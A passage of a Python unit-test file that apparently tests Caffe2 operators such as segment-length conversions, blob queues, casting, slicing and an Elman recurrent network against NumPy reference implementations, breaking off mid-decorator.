@given(lengths=st.lists(st.integers(min_value=0, max_value=10),
min_size=0,
max_size=10),
**hu.gcs_cpu_only)
def test_lengths_to_segment_ids(self, lengths, gc, dc):
op = core.CreateOperator(
"LengthsToSegmentIds",
["lengths"],
["segment_ids"])
def op_ref(lengths):
sids = []
for i, l in enumerate(lengths):
sids.extend(l * [i])
return (np.array(sids, dtype=np.int32), )
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=[np.array(lengths, dtype=np.int32)],
reference=op_ref)
@given(lengths=st.lists(st.integers(min_value=0, max_value=10),
min_size=0,
max_size=10),
**hu.gcs_cpu_only)
def test_lengths_range_fill(self, lengths, gc, dc):
op = core.CreateOperator(
"LengthsRangeFill",
["lengths"],
["increasing_seq"])
def op_ref(lengths):
sids = []
for _, l in enumerate(lengths):
sids.extend(list(range(l)))
return (np.array(sids, dtype=np.int32), )
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=[np.array(lengths, dtype=np.int32)],
reference=op_ref)
@given(**hu.gcs_cpu_only)
def test_segment_ids_to_ranges(self, gc, dc):
lengths = [4, 6, 3, 2, 0, 4]
op = core.CreateOperator(
"SegmentIdsToRanges",
["segment_ids"],
["ranges"])
def op_ref(segment_ids):
ranges = [np.array([0, 0], dtype=np.int32)]
prev = 0
for i, sid in enumerate(segment_ids):
while sid != prev:
prev += 1
ranges.append(np.array([i, 0], dtype=np.int32))
ranges[-1][1] += 1
return (np.array(ranges, dtype=np.int32), )
def lengths_to_segment_ids(lengths):
sids = []
for i, l in enumerate(lengths):
sids.extend(l * [i])
return (np.array(sids, dtype=np.int32), )
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=np.array(lengths_to_segment_ids(lengths), dtype=np.int32),
reference=op_ref)
@given(lengths=st.lists(st.integers(min_value=0, max_value=10),
min_size=0,
max_size=10),
**hu.gcs_cpu_only)
def test_lengths_to_ranges(self, lengths, gc, dc):
op = core.CreateOperator(
"LengthsToRanges",
["lengths"],
["ranges"])
def op_ref(x):
if not x.size:
return (x.reshape((0, 2)), )
return (np.column_stack((np.concatenate(([0], np.cumsum(x)[:-1])),
x)), )
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=[np.array(lengths, dtype=np.int32)],
reference=op_ref)
@given(prediction=hu.arrays(dims=[10, 3],
elements=st.floats(allow_nan=False,
allow_infinity=False,
min_value=0,
max_value=1)),
labels=hu.arrays(dims=[10],
dtype=np.int32,
elements=st.integers(min_value=0,
max_value=3 - 1)),
**hu.gcs)
def test_multi_class_accuracy(self, prediction, labels, gc, dc):
op = core.CreateOperator(
"MultiClassAccuracy",
["prediction", "labels"],
["accuracies", "amounts"]
)
def op_ref(prediction, labels):
N = prediction.shape[0]
D = prediction.shape[1]
accuracies = np.empty(D, dtype=float)
accuracies.fill(0)
amounts = np.empty(D, dtype=int)
amounts.fill(0)
max_ids = np.argmax(prediction, axis=1)
for i in range(0, N):
max_id = max_ids[i]
label_id = labels[i]
if max_id == label_id:
accuracies[label_id] += 1
amounts[label_id] += 1
for i in range(0, D):
amount = amounts[i]
if amount:
accuracies[i] /= amount
return (accuracies, amounts,)
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=[prediction, labels],
reference=op_ref)
@given(lengths=st.lists(st.integers(min_value=0, max_value=10),
min_size=0,
max_size=10),
**hu.gcs_cpu_only)
def test_segment_ids_to_lengths(self, lengths, gc, dc):
op = core.CreateOperator(
"SegmentIdsToLengths",
["segment_ids"],
["lengths"])
def lengths_to_ids(lengths):
sids = []
for i, l in enumerate(lengths):
sids.extend(l * [i])
return sids
segment_ids = lengths_to_ids(lengths)
def ids_to_lengths(ids):
ids_length = len(ids)
if ids_length == 0:
return (np.array([], dtype=np.int32),)
lengths = []
# segment id starts with 0
prev_id = -1
tmp_length = 0
for idx in range(ids_length):
cur_id = ids[idx]
if cur_id != prev_id:
if idx != 0:
lengths.append(tmp_length)
while prev_id + 1 != cur_id:
lengths.append(0)
prev_id += 1
prev_id = cur_id
tmp_length = 0
tmp_length += 1
lengths.append(tmp_length)
return (np.array(lengths, dtype=np.int32),)
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=[np.array(segment_ids, dtype=np.int32)],
reference=ids_to_lengths)
@given(lengths=st.lists(st.integers(min_value=1, max_value=10),
min_size=0,
max_size=10),
power=st.sampled_from([0.5, 1.0, 1.5, 2.0]),
**hu.gcs_cpu_only)
def test_lengths_to_weights(self, lengths, power, gc, dc):
op = core.CreateOperator(
"LengthsToWeights",
["lengths"],
["weights"],
power=power)
def lengths_to_weights(lengths):
weighted_length = []
for l in lengths:
weighted_length.extend(l * [1 / pow(l, power)])
return (np.array(weighted_length, dtype=float),)
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=[np.array(lengths, dtype=np.int32)],
reference=lengths_to_weights)
@given(input_tensor=hu.arrays(
dims=[10], elements=st.floats(allow_nan=False,
allow_infinity=False)),
**hu.gcs)
def test_abs(self, input_tensor, gc, dc):
op = core.CreateOperator(
"Abs",
["input"],
["output"]
)
def abs_ref(input_tensor):
return (np.abs(input_tensor),)
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=[input_tensor],
reference=abs_ref)
@given(input_tensor=hu.arrays(
dims=[10], elements=st.floats(min_value=-10,
max_value=10)),
**hu.gcs)
def test_cos(self, input_tensor, gc, dc):
op = core.CreateOperator(
"Cos",
["input"],
["output"]
)
def cos_ref(input_tensor):
return (np.cos(input_tensor),)
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=[input_tensor],
reference=cos_ref)
@given(input_tensor=hu.arrays(
dims=[10], elements=st.floats(min_value=-10,
max_value=10)),
**hu.gcs)
def test_sin(self, input_tensor, gc, dc):
op = core.CreateOperator(
"Sin",
["input"],
["output"]
)
def sin_ref(input_tensor):
return (np.sin(input_tensor),)
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=[input_tensor],
reference=sin_ref)
@given(input_tensor=hu.arrays(
dims=[10], elements=st.floats(allow_nan=False,
allow_infinity=False)),
**hu.gcs)
def test_exp(self, input_tensor, gc, dc):
op = core.CreateOperator(
"Exp",
["input"],
["output"]
)
def exp_ref(input_tensor):
return (np.exp(input_tensor),)
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=[input_tensor],
reference=exp_ref)
@given(input_tensor=hu.arrays(
dims=[10], elements=st.floats(min_value=1,
max_value=10000)),
**hu.gcs_cpu_only)
def test_log(self, input_tensor, gc, dc):
op = core.CreateOperator(
"Log",
["input"],
["output"]
)
def log_ref(input_tensor):
return (np.log(input_tensor),)
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=[input_tensor],
reference=log_ref)
self.assertGradientChecks(gc, op, [input_tensor], 0, [0])
def test_blobs_dequeue_timeout(self):
op = core.CreateOperator(
"CreateBlobsQueue",
[],
["queue"],
capacity=5,
num_blobs=1)
self.ws.run(op)
t = time.time()
op = core.CreateOperator(
"DequeueBlobs",
["queue"],
["out"],
timeout_secs=0.2)
self.assertRaises(RuntimeError, lambda: self.ws.run(op))
t = time.time() - t
self.assertGreater(t, 0.19)
@given(num_threads=st.integers(1, 10), # noqa
num_elements=st.integers(1, 100),
capacity=st.integers(1, 5),
num_blobs=st.integers(1, 3),
do=st.sampled_from(hu.device_options))
def test_blobs_queue_threading(self, num_threads, num_elements,
capacity, num_blobs, do):
"""
- Construct matrices of size N x D
- Start K threads
- Push all N rows into the queue of capacity C
- Pull all N rows out of the queue.
- Verify that the output matrices are permutation of the rows of the
original matrices.
"""
import threading
try:
import queue
except ImportError:
# Py3
import Queue as queue
op = core.CreateOperator(
"CreateBlobsQueue",
[],
["queue"],
capacity=capacity,
num_blobs=num_blobs,
device_option=do)
self.ws.run(op)
xs = [np.random.randn(num_elements, 5).astype(np.float32)
for _ in range(num_blobs)]
q = queue.Queue()
for i in range(num_elements):
q.put([x[i] for x in xs])
def enqueue(t):
while True:
feed_blobs = ["x_{}_{}".format(i, t) for i in range(num_blobs)]
op = core.CreateOperator(
"EnqueueBlobs",
["queue"] + feed_blobs,
feed_blobs,
device_option=do)
try:
elems = q.get_nowait()
for elem, feed_blob in zip(elems, feed_blobs):
self.ws.create_blob(feed_blob).feed(
elem, device_option=do)
self.ws.run(op)
except queue.Empty:
return
# Create all blobs before racing on multiple threads
# (blob creation is not threadsafe)
for t in range(num_threads):
for i in range(num_blobs):
self.ws.create_blob("x_{}_{}".format(i, t))
threads = [threading.Thread(target=enqueue, args=(t,))
for t in range(num_threads)]
for thread in threads:
thread.start()
for n in range(num_elements):
dequeue_blobs = ["y_{}_{}".format(i, n) for i in range(num_blobs)]
op = core.CreateOperator(
"DequeueBlobs",
["queue"],
dequeue_blobs,
device_option=do)
self.ws.run(op)
for thread in threads:
thread.join()
op = core.CreateOperator("CloseBlobsQueue", ["queue"], [])
self.ws.run(op)
ys = [np.vstack([self.ws.blobs["y_{}_{}".format(i, n)].fetch()
for n in range(num_elements)])
for i in range(num_blobs)]
for i in range(num_blobs):
self.assertEqual(ys[i].shape, xs[i].shape)
for j in range(num_elements):
# Verify that the rows of the returned blob are a
# permutation. The order may be different due to
# different threads racing.
self.assertTrue(
any(np.array_equal(xs[i][j], ys[i][k])
for k in range(num_elements)))
@given(num_producers=st.integers(1, 10),
num_consumers=st.integers(1, 10),
capacity=st.integers(1, 5),
num_blobs=st.integers(1, 3),
do=st.sampled_from(hu.device_options))
def test_safe_blobs_queue(self, num_producers, num_consumers,
capacity, num_blobs, do):
init_net = core.Net('init_net')
queue = init_net.CreateBlobsQueue(
[], 1, capacity=capacity, num_blobs=num_blobs)
producer_steps = []
truth = 0
for i in range(num_producers):
name = 'producer_%d' % i
net = core.Net(name)
blobs = [net.ConstantFill([], 1, value=1.0, run_once=False)
for times in range(num_blobs)]
status = net.NextName()
net.SafeEnqueueBlobs([queue] + blobs, blobs + [status])
count = (i + 1) * 10
step = core.execution_step(name, net, num_iter=count)
truth += count
producer_steps.append(step)
producer_exit_net = core.Net('producer_exit_net')
producer_exit_net.CloseBlobsQueue([queue], 0)
producer_step = core.execution_step('producer', [
core.execution_step(
'producers', producer_steps, concurrent_substeps=True),
core.execution_step('producer_exit', producer_exit_net)]
)
consumer_steps = []
counters = []
const_1 = init_net.ConstantFill([], 1, value=1.0)
for i in range(num_consumers):
name = 'consumer_%d' % i
net1 = core.Net(name)
blobs = net1.SafeDequeueBlobs([queue], num_blobs + 1)
status = blobs[-1]
net2 = core.Net(name + '_counter')
counter = init_net.ConstantFill([], 1, value=0.0)
counters.append(counter)
net2.Add([counter, const_1], counter)
consumer_steps.append(core.execution_step(
name, [net1, net2], should_stop_blob=status))
consumer_step = core.execution_step(
'consumer', consumer_steps, concurrent_substeps=True)
init_step = core.execution_step('init', init_net)
worker_step = core.execution_step(
'worker', [consumer_step, producer_step], concurrent_substeps=True)
plan = core.Plan('test')
plan.AddStep(init_step)
plan.AddStep(worker_step)
self.ws.run(plan)
v = 0
for counter in counters:
v += self.ws.blobs[str(counter)].fetch().tolist()
self.assertEqual(v, truth)
@given(num_queues=st.integers(1, 5),
num_iter=st.integers(5, 10),
capacity=st.integers(1, 5),
num_blobs=st.integers(1, 3))
def test_weighted_sample_blobs_queue(
self, num_queues, num_iter, capacity, num_blobs
):
# Create BlobsQueue for each input queue
print("num_queues", num_queues)
init_net = core.Net('init_net')
queues = [
init_net.CreateBlobsQueue(
[], 1, capacity=capacity, num_blobs=num_blobs
) for _ in range(num_queues)
]
# Create multiple producer nets and one producer exist net
producer_steps = []
producer_exit_nets = []
for i in range(num_queues):
name = 'producer_%d' % i
net = core.Net(name)
blobs = [net.ConstantFill([], 1, value=1.0, run_once=False)
for _ in range(num_blobs)]
status = net.NextName()
net.SafeEnqueueBlobs([queues[i]] + blobs, blobs + [status])
exit_net = core.Net('producer_exit_%d' % i)
exit_net.CloseBlobsQueue(queues[i], 0)
producer_exit_nets.append(exit_net)
step = core.execution_step(
name, [
core.execution_step(
'producer_%d' % i, [net], num_iter=num_iter
),
core.execution_step('producer_exit_%d' % i, [exit_net]),
]
)
producer_steps.append(step)
producer_step = core.execution_step(
'producer', [
core.execution_step(
'producers',
producer_steps,
concurrent_substeps=True,
),
]
)
status_lst = []
def append(ins, outs):
status_lst.append(ins)
# Create one consumer dequeue net and one consumer exist net
consumer_net = core.Net('weight_sample_dequeue_net')
blobs = consumer_net.WeightedSampleDequeueBlobs(
queues,
num_blobs + 1,
weights=np.random.uniform(low=0.0, high=1.0, size=(num_queues,))
)
status = blobs[-1]
consumer_net.Python(append)(status)
consumer_step = core.execution_step(
'consumer',
[
core.execution_step(
'consumer', [consumer_net], should_stop_blob=status
),
core.execution_step('producer_exit', producer_exit_nets)
]
)
init_step = core.execution_step('init', init_net)
worker_step = core.execution_step(
'worker', [producer_step, consumer_step], concurrent_substeps=True)
plan = core.Plan('test')
plan.AddStep(init_step)
plan.AddStep(worker_step)
self.ws.run(plan)
assert len(status_lst) >= num_iter + 1
assert len(status_lst) <= num_iter * num_queues + 1
@given(
data=hu.tensor(),
**hu.gcs_cpu_only)
def test_squeeze_expand_dims(self, data, gc, dc):
dims = [0, 0]
if len(data.shape) > 2:
dims.append(2)
op = core.CreateOperator(
"ExpandDims",
["data"],
["expanded"],
dims=dims)
def expand_dims_ref(data, *args, **kw):
inc_dims = list(set(dims))
inc_dims.sort()
r = data
for dim in inc_dims:
r = np.expand_dims(r, axis=dim)
return (r, )
def squeeze_ref(data, *args, **kw):
dec_dims = list(set(dims))
dec_dims.sort(reverse=True)
r = data
for dim in dec_dims:
r = np.squeeze(r, axis=dim)
return (r, )
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=[data],
reference=expand_dims_ref,
output_to_grad='expanded',
grad_reference=squeeze_ref)
@given(**hu.gcs_cpu_only)
def test_tt_layer(self, gc, dc):
seed = 1234
np.random.seed(seed)
inp_sizes = [2, 2, 2, 2]
out_sizes = [2, 2, 2, 2]
tt_ranks = [1, 3, 3, 3, 1]
op = core.CreateOperator(
"TT",
["X", "b", "cores"],
["Y"],
inp_sizes=inp_sizes,
out_sizes=out_sizes,
tt_ranks=tt_ranks,
)
X = np.expand_dims(
np.random.rand(16).astype(np.float32), axis=0)
b = np.array([0] * 16).astype(np.float32)
cores = tt_core.init_tt_cores(inp_sizes, out_sizes, tt_ranks)
self.ws.create_blob("X").feed(X)
self.ws.create_blob("b").feed(b)
self.ws.create_blob("cores").feed(cores)
self.ws.run(op)
Y = self.ws.blobs[("Y")].fetch()
Y = Y.reshape([16])
golden = np.array([-9.51763490e-07, -1.28442286e-06,
-2.86281141e-07, 2.28865644e-07,
-1.96180017e-06, -1.78920531e-06,
9.31094666e-07, -2.04273989e-07,
1.70017107e-06, 1.64845711e-06,
-1.06099132e-06, -4.69111137e-07,
6.57552358e-08, -1.28942040e-08,
-2.29114004e-07, -1.04262714e-06])
# This golden array is dependent on the specified inp_sizes, out_sizes,
# tt_ranks, and seed. Changing these will cause the test to fail.
self.assertAlmostEqual(np.linalg.norm(golden - Y), 0, delta=1e-10)
@given(num_workers=st.integers(1, 10),
net_type=st.sampled_from(
["simple", "dag"] +
(["async_dag"] if workspace.has_gpu_support else [])),
do=st.sampled_from(hu.device_options))
def test_dag_net_forking(self, net_type, num_workers, do):
from caffe2.python.model_helper import ModelHelper
from caffe2.python import brew
m = ModelHelper(name="test_model")
n = 10
d = 2
depth = 2
iters = 5
np.random.seed(1701)
# Build a binary tree of FC layers, summing at each node.
for i in reversed(range(depth)):
for j in range(2 ** i):
bottom_1 = "{}_{}".format(i + 1, 2 * j)
bottom_2 = "{}_{}".format(i + 1, 2 * j + 1)
mid_1 = "{}_{}_m".format(i + 1, 2 * j)
mid_2 = "{}_{}_m".format(i + 1, 2 * j + 1)
top = "{}_{}".format(i, j)
brew.fc(
m,
bottom_1, mid_1,
dim_in=d, dim_out=d,
weight_init=('ConstantFill', dict(value=np.random.randn())),
bias_init=('ConstantFill', dict(value=np.random.randn())))
brew.fc(
m,
bottom_2, mid_2,
dim_in=d, dim_out=d,
weight_init=('ConstantFill', dict(value=np.random.randn())),
bias_init=('ConstantFill', dict(value=np.random.randn())))
m.net.Sum([mid_1, mid_2], top)
m.net.SquaredL2Distance(["0_0", "label"], "xent")
m.net.AveragedLoss("xent", "loss")
input_to_grad = m.AddGradientOperators(["loss"])
m.Proto().device_option.CopyFrom(do)
m.param_init_net.Proto().device_option.CopyFrom(do)
m.Proto().type = net_type
m.Proto().num_workers = num_workers
self.ws.run(m.param_init_net)
print(str(m.Proto()))
def run():
import numpy as np
np.random.seed(1701)
input_blobs = ["{}_{}".format(depth, j) for j in range(2 ** depth)]
for input_blob in input_blobs:
self.ws.create_blob(input_blob).feed(
np.random.randn(n, d).astype(np.float32),
device_option=do)
self.ws.create_blob("label").feed(
np.random.randn(n, d).astype(np.float32),
device_option=do)
self.ws.run(m.net)
gradients = [
self.ws.blobs[str(input_to_grad[input_blob])].fetch()
for input_blob in input_blobs]
return gradients
outputs = [run() for _ in range(iters)]
for output in outputs[1:]:
np.testing.assert_array_equal(outputs[0], output)
self.assertAlmostEqual(np.sum(np.square(output)), 91.81752,
delta=1e-2)
@given(input=hu.tensor(min_dim=2, max_dim=6, dtype=np.int32,
elements=st.integers(min_value=0,
max_value=2**32 - 1)),
slice_dim=st.integers(),
a=st.integers(),
b=st.integers(),
is_empty=st.booleans(),
**hu.gcs_cpu_only)
def test_slice(self, input, slice_dim, a, b, is_empty, gc, dc):
slice_dim = slice_dim % len(input.shape)
if (is_empty):
input = np.random.rand(*([0] + list(input.shape))).astype(np.int32)
slice_dim += 1
a = a % input.shape[slice_dim]
b = b % input.shape[slice_dim] + 1
start_vec = np.zeros(len(input.shape), dtype=np.int32)
end_vec = np.ones(len(input.shape), dtype=np.int32) * -1
start_vec[slice_dim] = min(a, b)
end_vec[slice_dim] = max(a, b)
op = core.CreateOperator(
"Slice",
["input", "start", "end"],
["output"])
def slice_ref(x, s, e):
if len(s.shape) == 0:
return x
slc = [slice(si, None if ei == -1 else ei) for si, ei in zip(s, e)]
return (x[slc], )
self.assertReferenceChecks(gc, op, [input, start_vec, end_vec],
slice_ref)
@given(data=hu.tensor(), **hu.gcs_cpu_only)
def test_shape(self, data, gc, dc):
op = core.CreateOperator("Shape", ["data"], ["shape"])
self.assertReferenceChecks(gc, op, [data], lambda x: (x.shape, ))
@given(data=hu.tensor(), **hu.gcs_cpu_only)
def test_has_elements(self, data, gc, dc):
op = core.CreateOperator("HasElements", ["data"], ["has_elements"])
self.assertReferenceChecks(gc, op, [data], lambda x: (len(x) > 0, ))
op = core.CreateOperator("IsEmpty", ["data"], ["is_empty"])
self.assertReferenceChecks(gc, op, [data], lambda x: (len(x) == 0, ))
@given(initial_iters=st.integers(0, 100),
max_iters=st.integers(0, 100))
def test_should_stop_as_criteria_net_execution_step(
self, initial_iters, max_iters):
net = core.Net("net")
net.Iter(["iter"], ["iter"])
self.ws.create_blob("iter").feed(
np.asarray([initial_iters]).astype(np.int64))
self.ws.create_blob("num_iters").feed(
np.asarray([max_iters]).astype(np.int64))
criteria_net = core.Net("criteria")
criteria_net.GE(["iter", "num_iters"], ["stop"])
criteria_net.Proto().external_output.extend(["stop"])
plan = core.Plan('plan')
plan.AddStep(core.execution_step(
'step', [criteria_net, net],
should_stop_blob=core.BlobReference("stop")))
self.ws.run(plan)
iters = self.ws.blobs[("iter")].fetch()
self.assertEqual(iters.dtype, np.int64)
self.assertEqual(iters[0], max(initial_iters, max_iters))
def test_disabled_execution_step(self):
def createNets(i, disabled):
should_stop = 'should_stop_{}'.format(i)
output = 'output_{}'.format(i)
# init content and stop signal
init = core.Net("init_{}".format(i))
init.ConstantFill(
[],
[output],
shape=[1],
value=0.0
)
init.Cast([output], [should_stop], to='bool')
# decide if disabled or not
criterion = core.Net("criterion_{}".format(i))
tmp = criterion.ConstantFill(
[],
shape=[1],
value=1.0 if disabled else 0.0
)
criterion.Cast([tmp], [should_stop], to='bool')
criterion.Proto().external_output.extend([should_stop])
# the body net is just to turn a 0 blob to 1
net = core.Net("net_{}".format(i))
net.ConstantFill(
[],
[output],
shape=[1],
value=1.0
)
# always end the loop
ender = core.Net("ender_{}".format(i))
tmp = ender.ConstantFill(
[],
shape=[1],
value=1.0
)
ender.Cast([tmp], [should_stop], to='bool')
ender.Proto().external_output.extend([should_stop])
return [init, criterion, net, ender]
nets = [createNets(1, False),
createNets(2, True),
createNets(3, False)]
steps = [
core.execution_step(
'step_1', nets[0],
should_stop_blob=core.BlobReference('should_stop_1')),
core.execution_step(
'step_2', nets[1],
should_stop_blob=core.BlobReference('should_stop_2')),
core.execution_step('step_3', nets[2])
]
expected = [1.0, 0.0, 1.0]
plan = core.Plan('plan')
plan.AddStep(core.execution_step('all_steps', steps, num_iter=3))
self.ws.run(plan)
for i, _ in enumerate(nets):
self.assertEqual(
self.ws.blobs['output_{}'.format(i + 1)].fetch()[0],
expected[i])
@given(initial_iters=st.integers(0, 100),
num_iters=st.integers(0, 100))
def test_iter_count_with_execution_step(self, initial_iters, num_iters):
net = core.Net("net")
net.Iter(["iter"], ["iter"])
self.ws.create_blob("iter").feed(
np.asarray([initial_iters]).astype(np.int64))
step = core.ExecutionStep("step", [net])
step.SetIter(num_iters)
plan = core.Plan("plan")
plan.AddStep(step)
self.ws.run(plan)
iters = self.ws.blobs[("iter")].fetch()
self.assertEqual(iters.dtype, np.int64)
self.assertEqual(iters[0], initial_iters + num_iters)
@given(initial_iters=st.integers(0, 100),
num_iters=st.integers(0, 100),
num_nets=st.integers(0, 5))
def test_atomic_iter_with_concurrent_steps(self, initial_iters, num_iters,
num_nets):
init_net = core.Net("init_net")
iter_mutex = init_net.CreateMutex([], ["iter_mutex"])
self.ws.create_blob("iter").feed(
np.asarray([initial_iters]).astype(np.int64))
concurrent_steps = core.ExecutionStep("concurrent_steps",
num_iter=num_iters)
for i in range(num_nets):
net = core.Net("net_{}".format(i))
net.AtomicIter([iter_mutex, "iter"], ["iter"])
step = core.ExecutionStep("step", [net])
concurrent_steps.AddSubstep(step)
concurrent_steps.SetConcurrentSubsteps(True)
plan = core.Plan("plan")
plan.AddStep(concurrent_steps)
self.ws.run(init_net)
self.ws.run(plan)
iters = self.ws.blobs[("iter")].fetch()
self.assertEqual(iters.dtype, np.int64)
self.assertEqual(iters[0], initial_iters + num_iters * num_nets)
@given(a=hu.tensor(),
src=st.sampled_from(list(viewkeys(_NUMPY_TYPE_TO_ENUM))),
dst=st.sampled_from(list(viewkeys(_NUMPY_TYPE_TO_ENUM))),
use_name=st.booleans(),
**hu.gcs)
def test_cast(self, a, src, dst, use_name, gc, dc):
a = a.astype(src)
# Casting from a float type outside the range of the integral
# type is UB.
ftypes = [np.float32, np.float64]
if src in ftypes and dst not in ftypes and dst is not np.bool:
info = np.iinfo(dst)
a = np.clip(a, info.min, info.max)
def ref(data):
return [data.astype(dst)]
to = _NUMPY_TYPE_TO_ENUM[dst]
if use_name:
to = TensorProto.DataType.Name(to).lower()
op = core.CreateOperator('Cast', ["X"], ["Y"], to=to)
self.assertDeviceChecks(dc, op, [a], [0])
out, = self.assertReferenceChecks(gc, op, [a], ref)
self.assertEqual(dst, out.dtype)
@given(a=hu.tensor(),
eps=st.floats(min_value=1e-4, max_value=1e-2),
**hu.gcs_cpu_only)
def test_logit(self, a, eps, gc, dc):
def ref(data):
data = np.clip(data, eps, 1.0 - eps)
return (np.log(data / (1 - data)), )
op = core.CreateOperator('Logit', ["X"], ["Y"], eps=eps)
self.assertDeviceChecks(dc, op, [a], [0])
self.assertReferenceChecks(gc, op, [a], ref)
@given(a=hu.tensor(elements=st.floats(allow_nan=True)),
value=st.floats(min_value=-10, max_value=10),
**hu.gcs_cpu_only)
def test_replace_nan(self, a, value, gc, dc):
def ref(data):
out = np.copy(data)
out[np.isnan(data)] = value
return (out, )
op = core.CreateOperator('ReplaceNaN', ["X"], ["Y"], value=value)
self.assertDeviceChecks(dc, op, [a], [0])
self.assertReferenceChecks(gc, op, [a], ref)
@given(data=_dtypes(dtypes=[np.int32, np.int64, np.float32, np.bool]).
flatmap(lambda dtype: hu.tensor(
min_dim=1, dtype=dtype, elements=hu.elements_of_type(dtype))),
has_input=st.booleans(),
has_extra_shape=st.booleans(),
extra_shape=st.lists(
min_size=1, max_size=5, elements=st.integers(1, 5)),
**hu.gcs)
def test_constant_fill(self, data, has_input, has_extra_shape, extra_shape,
gc, dc):
dtype = data.dtype.type
# in opt mode, np.bool is converted into np.bool_
if data.dtype == np.dtype(np.bool):
dtype = np.bool
value = data.item(0)
gt_shape = data.shape
inputs = [data]
enum_type = _NUMPY_TYPE_TO_ENUM[dtype]
if has_input:
if has_extra_shape:
op = core.CreateOperator('ConstantFill', ["X"], ["Y"],
dtype=enum_type,
extra_shape=extra_shape,
value=value)
gt_shape += tuple(extra_shape)
else:
op = core.CreateOperator('ConstantFill', ["X"], ["Y"],
dtype=enum_type,
value=value)
else:
op = core.CreateOperator('ConstantFill', [], ["Y"],
dtype=enum_type,
value=value,
shape=list(gt_shape))
inputs = []
def ref(inputs=None):
outputs = np.full(shape=gt_shape, fill_value=value, dtype=dtype)
return [outputs]
self.assertDeviceChecks(dc, op, inputs, [0])
out, = self.assertReferenceChecks(gc, op, inputs, ref)
self.assertEqual(dtype, out.dtype)
@given(t=st.integers(1, 5),
n=st.integers(1, 5),
d=st.integers(1, 5))
def test_elman_recurrent_network(self, t, n, d):
from caffe2.python import model_helper, brew
np.random.seed(1701)
step_net = model_helper.ModelHelper(name="Elman")
# TODO: name scope external inputs and outputs
step_net.Proto().external_input.extend(
["input_t", "seq_lengths", "timestep",
"hidden_t_prev", "gates_t_w", "gates_t_b"])
step_net.Proto().type = "simple"
step_net.Proto().external_output.extend(["hidden_t", "gates_t"])
brew.fc(step_net,
"hidden_t_prev", "gates_t", dim_in=d, dim_out=d, axis=2)
step_net.net.Sum(["gates_t", "input_t"], ["gates_t"])
step_net.net.Sigmoid(["gates_t"], ["hidden_t"])
# Initialize params for step net in the parent net
for op in step_net.param_init_net.Proto().op:
workspace.RunOperatorOnce(op)
backward_ops, backward_mapping = core.GradientRegistry.GetBackwardPass(
step_net.Proto().op, {"hidden_t": "hidden_t_grad"})
backward_mapping = {
str(k): str(v) for k, v in viewitems(backward_mapping)
}
backward_step_net = core.Net("ElmanBackward")
del backward_step_net.Proto().op[:]
backward_step_net.Proto().op.extend(backward_ops)
assert backward_mapping["input_t"] == "gates_t_grad"
links = [
("hidden_t_prev", "hidden", 0),
("hidden_t", "hidden", 1),
("input_t", "input", 0),
]
link_internal, link_external, link_offset = zip(*links)
backward_links = [
("hidden_t_prev_grad", "hidden_grad", 0),
("hidden_t_grad", "hidden_grad", 1),
("gates_t_grad", "input_grad", 0),
]
backward_link_internal, backward_link_external, backward_link_offset = \
zip(*backward_links)
backward_step_net.Proto().external_input.extend(["hidden_t_grad"])
backward_step_net.Proto().external_input.extend(
step_net.Proto().external_input)
backward_step_net.Proto().external_input.extend(
step_net.Proto().external_output)
inputs = ["input", "seq_lengths", "gates_t_w", "gates_t_b", "hidden_input"]
recurrent_inputs = ["hidden_input"]
op = core.CreateOperator(
"RecurrentNetwork",
inputs,
["output", "hidden", "hidden_output", "step_workspaces"],
alias_src=["hidden", "hidden"],
alias_dst=["output", "hidden_output"],
alias_offset=[1, -1],
recurrent_states=["hidden"],
initial_recurrent_state_ids=[
inputs.index(i) for i in recurrent_inputs
],
link_internal=link_internal,
link_external=link_external,
link_offset=link_offset,
backward_link_internal=backward_link_internal,
backward_link_external=backward_link_external,
backward_link_offset=backward_link_offset,
param=[inputs.index(p) for p in step_net.params],
step_net=str(step_net.Proto()),
backward_step_net=str(backward_step_net.Proto()),
outputs_with_grads=[0],
)
workspace.FeedBlob(
"input", np.random.randn(t, n, d).astype(np.float32))
workspace.FeedBlob(
"hidden_input", np.random.randn(1, n, d).astype(np.float32))
workspace.FeedBlob(
"seq_lengths", np.random.randint(0, t, size=(n,)).astype(np.int32))
def reference(input, seq_lengths, gates_w, gates_b, hidden_input):
T = input.shape[0]
N = input.shape[1]
D = input.shape[2]
hidden = np.zeros(shape=(T + 1, N, D))
assert hidden.shape[0] == T + 1
assert hidden.shape[1] == N
assert hidden.shape[2] == D
hidden[0, :, :] = hidden_input
for t in range(T):
input_t = input[t].reshape(1, N, D)
hidden_t_prev = hidden[t].reshape(1, N, D)
gates = np.dot(hidden_t_prev, gates_w.T)
gates = gates.reshape(1, N, D) + input_t.reshape(1, N, D)
hidden[t + 1] = sigmoid(gates)
return hidden[1:], hidden, hidden[-1].reshape(1, N, D)
self.assertReferenceChecks(
hu.cpu_do,
op,
[workspace.FetchBlob(name)
for name in ["input", "seq_lengths", "gates_t_w", "gates_t_b",
"hidden_input"]],
reference,
outputs_to_check=[0, 1, 2])
for param in [0, 2, 3]:
self.assertGradientChecks(
hu.cpu_do,
op,
[workspace.FetchBlob(name)
for name in ["input", "seq_lengths", "gates_t_w", "gates_t_b",
"hidden_input"]],
param,
[0])
@given(n=st.integers(1, 5),
c=st.integers(1, 5),
h=st.integers(1, 5),
w=st.integers(1, 5),
pad=st.integers(0, 2),
block_size=st.integers(2, 3),
**hu.gcs)
def test_space_to_batch(self, n, c, h, w, pad, block_size, gc, dc):
assume((h + 2 * pad) % block_size == 0)
assume((w + 2 * pad) % block_size == 0)
X = np.random.randn(n, c, h, w).astype(np.float32)
op = core.CreateOperator("SpaceToBatch", ["X"], ["Y"],
pad=pad, block_size=block_size)
self.assertDeviceChecks(dc, op, [X], [0])
self.assertGradientChecks(gc, op, [X], 0, [0])
@given(n=st.integers(1, 5),
c=st.integers(1, 5),
h=st.integers(1, 5),
w=st.integers(1, 5),
pad=st.integers(0, 2),
block_size=st.integers(2, 3),
